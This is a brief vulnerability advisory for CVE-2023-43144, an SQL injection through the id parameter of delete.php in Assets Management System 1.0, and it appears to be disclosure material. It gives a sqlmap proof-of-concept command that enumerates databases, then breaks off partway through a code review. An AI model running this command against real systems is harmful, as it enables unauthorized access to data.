Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php
CVE-2023-43144 Description Assets Management System 10 is vulnerable to SQL injection via the id parameter in deletephp PoC sqlmap -u 'localhost/deletephp?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch Code review (deletephp) <?php include 'core/initphp'; $id = $_